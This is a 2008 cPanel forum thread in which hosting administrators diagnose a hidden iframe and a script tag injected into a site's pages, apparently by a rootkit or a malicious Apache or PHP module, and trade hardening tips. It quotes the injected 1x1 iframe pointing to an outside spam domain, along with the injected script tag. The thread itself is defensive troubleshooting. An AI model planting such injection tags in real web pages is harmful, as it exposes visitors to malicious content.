The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

iframe js attack - please help.

Discussion in 'General Discussion' started by sh4ka, Apr 19, 2008.

  1. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    Hello,

    It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.

    We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.

    I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

    This is a RHE 4 + cPanel server, any help is appreciated. This is the iframe code:

    Code:
    iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2'
    
    Thanks.
     
  2. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    It sounds that the IFRAME JS code you're dealing with is the encoded version. This thread might help: http://forums.cpanel.net/showthread.php?t=62821&goto=newpost
     
  3. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Upload Guardian can help prevent future attacks from iframe hacks simply but adding a few customized rules. Chances are the site was hacked from an insecure script or brute forced FTP password.
     
  4. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I saw this on other server a few hours ago, customer files didn't get modified, and this also happened randomly even with a file with just a phpinfo() line on it. I'm afraid is deeped than a simple script injection or a ftp compromised, the script is only a phpinfo();, no more lines, but the output has the iframe

    We should share some info about the affected servers, this had Apache 1.3 and PHP 4.4.8
     
  5. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    interessting product you got there ramprage, i might need to give it a little fiddle in the near future :)
     
  6. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    upgrade apache to 2.2.8 , php to 5.2.5 and mysql to 5.0.45
    install modsecurity when recompiling apache and enable at least the default rules!
    Additionaly install suhosin and harden your php (disable_function, register global, allow_url_fopen and others!
     
  7. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I'm not going to go php5 in this server, some scripts are not compatible yet, and that doesn't guarantee me this not happening, i've recompile apache 1.3.41 and php 4.4.8 and is still happening
     
  8. gorilla

    gorilla Well-Known Member

    Joined:
    Feb 3, 2004
    Messages:
    699
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney / Australia
    You can run apache 2.2.8 with php4 as well
    and have you also installed modsecurity when recompiling apache and enable at least the default rules!
    Aswell as suhosin and hardened your php?
     
  9. sh4ka

    sh4ka Well-Known Member

    Joined:
    May 12, 2005
    Messages:
    442
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    cPanel Access Level:
    DataCenter Provider
    The problem is that no ftp logs show any uploaded information, this is a php/apache related issue.
     
  10. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    In addition to what you said here, you can stop further IFRAME injection following these instructions: http://forums.cpanel.net/showpost.php?p=334204&postcount=325

    We wrote a script that will remove IFRAME JS code, both encoded and coded versions. Our script is proven effective in removing encoded IFRAME JS code on htm* and Php files. This script belongs to ServerTune and not something I can share or give away. Unfortunately it is not my call
     
    #10 AndyReed, Apr 20, 2008
    Last edited: Apr 20, 2008
  11. dragon2611

    dragon2611 Well-Known Member

    Joined:
    Nov 30, 2003
    Messages:
    126
    Likes Received:
    0
    Trophy Points:
    16
    It might not be there was a rootkit going around a few months back that had a similar effect.

    It worked by dynamically injecting the code into the pages as they were being served up by apache.

    Problem is Once you've got it it's not all that easy to get rid of as It modifies System binaries and and writes to the kernel memory and therefore is able to evade the likes of rkhunter.

    When I got infected a while back I'm afraid to say I Took the easy way out and reformatted the system as I had backups of the accounts anyway.

    I think it can be cleaned problem is compiling a clean kernel is not easily doable on the infected system you would probably have to boot from a boot disc and replace the kernel with one compiled elsewhere that's patched to prevent writing to /dev/kmem then you might stand a chance with cleaning it out.

    You would also need to replace any infected system binaries as well.

    try the following command somewhere where you should have write access

    mkdir 12345

    If it fails then time to seriously think about either hiring a professional or Reformatting the system.
     
    #11 dragon2611, Apr 20, 2008
    Last edited: Apr 20, 2008
  12. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    I have more info, in the phpinfo output, says the following

    Quote:
    <title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
    <body><script language='JavaScript' type='text/javascript' src='hhnkx.js'></script><div class="center">
    It inserts a script tag after the boy tag, being this just a phpinfo seems to me that this is being inserted automatically by 'something' in the Apache webserver or the php

    This is an apache/php related issue, the phpinfo output is generated directly by php and that output is being modified
     
  13. elmister

    elmister Active Member

    Joined:
    Mar 2, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Yes this activity seems to be more related to a rootkit activity than a failure itself in apache or php, chkrootkit detected a 'possible' LKM Trojan infection, now investigating
     
  14. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    This could be a rootkit but if a rootkit is involved, all sites on the server would be affected. be sure to check apache modules using '/usr/local/apache/bin/httpd -M' as well as php modules using 'php -m' for any suspicious modules. There have been problems with apache and php modules being loaded that allow this type of injection to occur without any direct file modification.
     
Loading...
Similar Threads - iframe attack please
  1. ApparentMedia
    Replies:
    1
    Views:
    415
  2. sahostking
    Replies:
    5
    Views:
    31,315

Share This Page